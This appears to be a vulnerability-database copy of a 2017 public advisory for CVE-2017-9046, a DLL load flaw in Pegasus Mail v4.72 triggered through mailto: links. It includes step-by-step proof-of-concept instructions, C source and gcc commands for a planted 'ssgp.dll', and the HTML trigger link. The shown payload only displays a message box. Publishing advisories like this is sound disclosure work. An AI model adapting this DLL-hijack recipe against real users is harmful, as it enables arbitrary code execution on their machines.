Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtHyp3rlinx1337DAY-ID-27812
HistoryMay 20, 2017 - 12:00 a.m.

Pegasus winpm-32.exe v4.72 Mailto: Link Remote Code Execution Vulnerability

2017-05-2000:00:00
hyp3rlinx
0day.today
42

0.001 Low

EPSS

Percentile

20.4%

JSON

Exploit for windows platform in category remote exploits

[+] Credits: John Page AKA hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/PEGASUS-MAILTO-LINK-REMOTE-CODE-EXECUTION.txt
[+] ISR: APPARITIONSEC



Vendor:
=============
www.pmail.com



Product:
===========================
Pegasus "winpm-32.exe"
v4.72 build 572


Pegasus Mail: Pegasus Mail is a free, standards-based electronic mail client suitable for use by single or multiple users on single
computers or on local area networks. A proven product, it has served millions of users since it was released in 1990.



Vulnerability Type:
======================
Remote Code Execution




CVE Reference:
==============
CVE-2017-9046



Security Issue:
================
Pegasus Mail has a DLL Load Flaw that allows arbitrary code execution by clicking an HTML "mailto:" link
if a DLL named "ssgp.dll" exists on the victims Desktop. Tested successfully using Internet Explorer Web Browser.

e.g.

<a href="mailto:[email protected]">Link text</a>

Place "ssgp.dll" on the desktop then visit the webpage in "Internet Explorer", click the mailto: link arbitrary code executed
and Pegasus (pmail) is then launched.

User needs to have setup PMAIL with "mailto:" link option on install.


Exploit:
========
1) Set Pegasus as default Email client for opening Emails, and setup PMAIL with "mailto:" link option on install.


2) Compile "ssgp.dll" as DLL using below 'C' code.

#include<windows.h>

//gcc -c ssgp.c
//gcc -shared -o ssgp.dll ssgp.o

BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){
switch (reason) {
case DLL_PROCESS_ATTACH:
MessageBox(NULL, "Code Execution!", "APPARITIONSEC", MB_OK);
break;
}

return 0;
}



3) Place "ssgp.dll" on Desktop


4) Create an HTML file with following in the web server root directory.
<a href="mailto:[email protected]">Pegasus Exploit POC</a>


5) Open webpage in InternetExplorer Web Browser and click malicious mailto: link.


Our code gets executed...

#  0day.today [2018-04-10]  #

Related

cvelist 1
packetstorm 1
cve 1
prion 1
nvd 1
cvelist
cvelist
CVE-2017-9046
2017-05-21 14:00:00
packetstorm
packetstorm
Pegasus 4.72 Build 572 Remote Code Execution
2017-05-20 00:00:00
cve
cve
CVE-2017-9046
2017-05-21 14:29:00
prion
prion
Code injection
2017-05-21 14:29:00
nvd
nvd
CVE-2017-9046
2017-05-21 14:29:00

0.001 Low

EPSS

Percentile

20.4%

JSON
Related for 1337DAY-ID-27812
cvelist1packetstorm1cve1prion1nvd1